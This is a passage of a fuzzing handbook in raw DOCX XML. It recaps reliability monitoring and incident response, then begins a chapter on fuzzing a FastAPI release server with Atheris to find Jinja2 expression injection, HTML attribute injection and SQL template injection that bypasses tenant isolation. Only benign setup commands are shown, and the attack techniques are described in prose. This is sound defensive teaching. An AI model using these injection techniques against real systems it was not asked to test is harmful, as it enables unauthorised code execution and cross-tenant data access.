      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Business rule validation results (logic failure detection)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="98"/>
    <w:bookmarkStart w:id="99" w:name="Xd34fcddb519551c8ea0e020eebf228850fa7573"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Intelligent Alert Generation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Raw monitoring data overwhelms operations teams. Your production monitoring needs the same intelligent filtering you apply during fuzzing campaigns—​focus on actionable reliability issues while filtering out normal operational variation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use the same statistical techniques from your fuzzing campaigns:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Baseline establishment from historical performance data.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Standard deviation analysis to identify significant deviations.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Correlation analysis to connect multiple symptoms to single root causes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your alert generation should distinguish between random performance variation and systematic reliability degradation that indicates the failure modes you discovered through fuzzing.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="99"/>
    <w:bookmarkStart w:id="100" w:name="X4f4b98eab1d1515ae763c6656f2eee896495dfd"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Intelligent Alert Generation and Prioritization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The volume of performance and resource consumption data generated by modern applications can quickly overwhelm traditional alerting systems. You need intelligent alert generation that can identify truly significant reliability issues while filtering out noise from normal operational variations and temporary performance fluctuations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Effective alert prioritization requires understanding the business impact of different types of reliability failures. A memory leak that develops over days might be less urgent than a ReDoS vulnerability that can be triggered instantly, but both require attention before they cause service outages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement alert correlation that can identify when multiple performance indicators suggest the same underlying reliability issue. Memory consumption increases combined with slower response times and increased error rates might all indicate the same resource exhaustion problem rather than three separate issues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create alert prioritization policies that consider both technical severity and business impact. Critical user-facing services should generate immediate alerts for performance degradation, while background processing systems might tolerate higher thresholds before triggering alerts.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="100"/>
    <w:bookmarkStart w:id="101" w:name="X829e99b3a956eb19211ad119e2acd43fa6ca25f"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Automated Incident Response and Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When your monitoring systems detect reliability failures, automated response capabilities can often prevent minor issues from escalating into major service outages. Circuit breakers, automatic scaling, resource cleanup, and graceful degradation mechanisms can all be triggered automatically when specific failure patterns are detected.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Automated incident response requires careful balance between rapid response and avoiding false positive triggers that might cause unnecessary service disruption. Your automation should be conservative enough to avoid creating problems while still providing meaningful protection against reliability failures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement graduated response policies that escalate through increasing levels of intervention: monitoring and alerting for minor issues, automatic resource cleanup for moderate problems, and service protection measures like rate limiting or graceful degradation for severe issues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create comprehensive logging and audit trails for all automated response actions. When automated systems take remediation actions, you need detailed records of what was detected, what actions were taken, and what the results were. This information is crucial for post-incident analysis and system improvement.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="101"/>
    <w:bookmarkStart w:id="102" w:name="X73172b78352be384a1113e4f8beeeb38b4f5266"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Continuous Improvement and Learning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The reliability monitoring and response systems you implement should continuously learn from operational experience and improve their effectiveness over time. Machine learning techniques can help identify new patterns of reliability failures, refine alert thresholds based on operational feedback, and optimize response policies based on historical effectiveness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement feedback loops that allow operational teams to provide input on alert accuracy and response effectiveness. This feedback helps refine monitoring thresholds and response policies to reduce false positives while ensuring genuine reliability issues receive appropriate attention.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Regularly analyze incident data to identify patterns and trends in reliability failures. Look for common root causes, recurring failure modes, and opportunities to prevent similar issues through improved monitoring or automated response capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create regular review processes that evaluate the effectiveness of your reliability monitoring and response systems. Track metrics like alert accuracy, response time, and incident prevention effectiveness to identify areas for improvement and validate the value of your reliability engineering investments.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="102"/>
    <w:bookmarkEnd w:id="103"/>
    <w:bookmarkStart w:id="104" w:name="X6cb6e2a2477b279ca6cec8be54682d5e681d2f8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter Recap: From Crashes to Comprehensive Service Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ve extended your Docker-plus-libFuzzer infrastructure from Chapter 2 beyond crash detection into the complete spectrum of reliability failures that don’t announce themselves with obvious symptoms.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ReDoS Detection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Your CPU monitoring harnesses catch regular expressions that consume exponential time under adversarial input. Email validation and URL parsing fuzzers using your established libFuzzer patterns identify performance denial-of-service vulnerabilities within 15-30 minutes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Memory Exhaustion Discovery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Container-based memory monitoring detects unbounded allocation and resource leaks that eventually crash services. Your sidecar monitoring approach tracks memory growth patterns, identifying slow leaks that manual testing never catches.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Logic Failure Detection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: State machine, authorization, and financial logic fuzzers discover business rule violations that corrupt data without triggering obvious errors. These harnesses use the same systematic exploration approach from crash detection to find edge cases where business logic breaks down.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The unified approach matters. Same Docker infrastructure. Same libFuzzer foundation. Same systematic exploration techniques. Extended from memory corruption into performance, resource management, and business logic reliability.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="104"/>
    <w:bookmarkStart w:id="105" w:name="X95634a4e85dba0ab7e4ec2735e8a0109d8dd1d9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Call to Action: Deploy Performance and Logic Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start with your highest-risk input processing: anything using regular expressions for validation. Email forms, URL parsing, content filtering. Build ReDoS detection harnesses using your established libFuzzer infrastructure from Chapter 2. Most applications have ReDoS vulnerabilities waiting to be discovered.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Next, target memory-intensive operations: JSON parsing, file uploads, caching systems. Deploy memory monitoring containers alongside your existing fuzzing infrastructure. Resource exhaustion bugs are common in applications that process variable-sized input.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finally, extract business logic validation from your most critical workflows: order processing, user account management, financial transactions. Build logic fuzzers that validate business rule enforcement using the same systematic exploration techniques you’ve mastered.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Focus on the reliability failures that actually impact your services. Don’t test theoretical edge cases—​target the input processing paths and business logic that handle real user data and could cause real service outages when they fail.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="105"/>
    <w:bookmarkStart w:id="106" w:name="X6bc5b40c2b4513b0ac68de3749199fc7e2fc7da"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Transition to Property-Based Reliability Validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your systematic reliability testing foundation—​crash detection, performance monitoring, resource tracking, and logic validation—​prepares you for the advanced techniques in Chapter 4. You’ll learn Google FuzzTest for property-based testing that verifies algorithmic correctness, differential fuzzing that compares behavior across implementations, and gRPC/protobuf testing for service communication reliability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">These advanced approaches build directly on the monitoring capabilities and systematic methodology you’ve developed. The transition from individual technique mastery to comprehensive reliability validation begins with property-based testing that verifies your services not only avoid failures, but consistently produce correct results under all input conditions.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">== Chapter 6: Python Service Reliability with Atheris</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Building Crash-Resistant FastAPI Services Through Systematic Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your internal release server just crashed during a critical deployment window. The logs show a UnicodeDecodeError in your upload endpoint—​a Unicode character in a release note brought down your software distribution pipeline. While your team restarts containers, developers are blocked from deploying fixes, and your incident response channel fills with frustrated messages about broken CI/CD pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This chapter teaches you to find these crashes before they hit production. We’ll use Atheris to systematically test a FastAPI release server, discovering three classes of Jinja2 vulnerabilities that manual testing rarely finds: expression injection in configuration processing, template structure corruption that changes application meaning, and SQL template injection that bypasses multi-tenant isolation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ll learn practical fuzzing skills through three progressive Jinja2 workflows: fuzzing template expressions in configuration data, corrupting template output to inject unauthorized HTML attributes, and exploiting SQL template construction to access unauthorized tenant data. Each workflow demonstrates systematic discovery of sophisticated Jinja2 vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">By the end, you’ll have hands-on experience finding Jinja2 expression injection, template structure corruption, and SQL template injection using Atheris. Let’s start building.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="106"/>
    <w:bookmarkStart w:id="107" w:name="Xd399d3806be5a257681825d836da146635b09ba"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Setting Up: Your Fuzzing Target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Clone the release server repository and start the environment:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The server processes structured data through three Jinja2 components you’ll fuzz: configuration template processing for dynamic settings, HTML template rendering for user interfaces, and SQL template construction for database queries. Each component has different crash surfaces that systematic fuzzing reveals.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start your Atheris container:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--network</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"container:release-server"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> atheris-env bash</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In 15 minutes, you’ll discover your first Jinja2 expression injection vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="107"/>
    <w:bookmarkStart w:id="108" w:name="X9bbd428f72d4f5abc4d419bcc2bb1076b794f6a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Atheris Fundamentals: Coverage-Guided Python Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Atheris applies coverage-guided fuzzing to Python applications using the same systematic exploration principles from libFuzzer. Generate inputs, track code path execution, save inputs that reach new code, mutate successful inputs to explore further. The difference lies in crash discovery—​Atheris finds Python runtime failures, unhandled exceptions, and logic errors that crash services.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create your first harness</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">basic_harness.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run your first fuzzing session:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> basic_harness.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Atheris tracks which lines of Python code get executed and focuses mutation on inputs that explore new code paths. You’ll see coverage statistics and execution feedback that guides the fuzzing process toward discovering crashes that manual testing typically misses.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="108"/>
    <w:bookmarkStart w:id="109" w:name="X2ab5790a8d0c634854ebda20eb6516956e9175f"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Jinja2 Template Engine Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Jinja2 powers template processing across Python applications, from web frameworks like Flask and Django to configuration management and document generation systems. Understanding Jinja2’s template syntax, security model, and processing pipeline provides the foundation for systematic vulnerability discovery across different application contexts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Template processing creates multiple attack surfaces where user-controlled data flows through Jinja2’s parsing and rendering engine. Variables, expressions, filters, and control structures all handle external input that can exploit parsing logic, execution context, or output generation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Release servers demonstrate Jinja2’s versatility across application layers: configuration templates for dynamic settings, HTML templates for user interfaces, and SQL templates for database queries. Each usage context creates different vulnerability patterns that systematic fuzzing reveals through targeted input generation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Section Recap:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Jinja2 template processing combines flexibility with complexity, creating attack surfaces in variable resolution, expression evaluation, and output generation. Understanding normal template operation provides the foundation for discovering edge cases where systematic input corruption reveals security vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="109"/>
    <w:bookmarkStart w:id="110" w:name="X18a7c978642d68add981687b8f7c538b015d61d"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Workflow 1: Jinja2 Expression Injection in Configuration Processing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Jinja2 expression injection vulnerabilities emerge when Atheris systematically corrupts template expressions embedded in configuration data, discovering parsing failures and code execution that crash configuration processing. Applications use Jinja2 for configuration templating because it enables dynamic settings, environment-specific values, and complex logic in otherwise static configuration files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Configuration templates process data from environment variables, command-line arguments, and external data sources. This external input flows through Jinja2’s expression evaluation engine, creating opportunities for injection attacks when expressions access dangerous built-in functions, traverse object hierarchies, or trigger infinite loops.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create your Jinja2 expression fuzzing harness</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">fuzz_config_workflow.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run the Jinja2 expression fuzzer:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> fuzz_config_workflow.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Within 10-15 minutes, you’ll discover Jinja2 expression injection crashes. Watch for code execution through template expressions, infinite loops in variable resolution, and memory exhaustion from malformed template syntax.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Jinja2 expression injection crashes typically occur during:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Method invocation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- expressions accessing dangerous Python methods through Jinja2’s object model</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Variable resolution cycles</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- circular references in template context causing infinite loops</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Built-in function abuse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- accessing system functions like</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">through Jinja2 globals</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Expression evaluation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- deeply nested expressions triggering stack overflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">These vulnerabilities transfer to any application that processes configuration templates, build scripts with variable substitution, or dynamic content generators. Configuration processors, deployment systems, and document generators all contain similar attack surfaces.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Key insight:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Jinja2 expression fuzzing reveals code execution and resource exhaustion that static analysis misses. The systematic approach generates expression combinations that stress parsing boundaries and execution limits.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="110"/>
    <w:bookmarkStart w:id="111" w:name="X2a00f3aeb02b2f44eb566d07f029717dc340ef5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Workflow 2: Template Structure Corruption</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Template corruption vulnerabilities emerge when Atheris systematically mutates user data flowing into templates, discovering input combinations that inject unauthorized HTML attributes and change application semantics. Web applications use Jinja2 to generate dynamic HTML where user data gets embedded in template contexts, creating opportunities for structural corruption that changes the intended meaning of rendered output.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Template structure corruption differs from traditional injection attacks because it targets the semantic meaning of rendered output rather than just visual appearance. User data that passes input validation can still corrupt HTML structure by injecting attributes that change element behavior, adding unauthorized properties that affect JavaScript processing, or modifying CSS classes that alter access control visualization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create your template corruption harness</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">fuzz_template_workflow.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run the template fuzzer:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> fuzz_template_workflow.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Within 15-20 minutes, you’ll discover template structure corruption. Watch for user data that injects HTML attributes changing element semantics, content that breaks intended template logic flow, and input that adds unauthorized properties to rendered output.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Template corruption manifests as:</w:t>
      </w:r>
